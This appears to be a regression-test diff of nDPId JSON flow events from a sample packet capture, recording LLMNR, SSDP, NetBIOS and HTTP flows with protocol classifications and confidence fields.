+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381217,"flow_last_seen":1470104381626,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382038,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382036,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1470104380909,"flow_last_seen":1470104420950,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":1585,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1470104380909,"flow_last_seen":1470104420950,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":1585,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396889,"flow_last_seen":1470104396987,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396889,"flow_last_seen":1470104396987,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104411327,"flow_last_seen":1470104411735,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104377634,"flow_last_seen":1470104415729,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1096,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104411327,"flow_last_seen":1470104411735,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104377634,"flow_last_seen":1470104415729,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1096,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399959,"flow_last_seen":1470104400366,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399959,"flow_last_seen":1470104400366,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00644{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104403134,"flow_last_seen":1470104403234,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391361,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416959,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416958,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
+00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104403134,"flow_last_seen":1470104403234,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391361,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416959,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416958,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
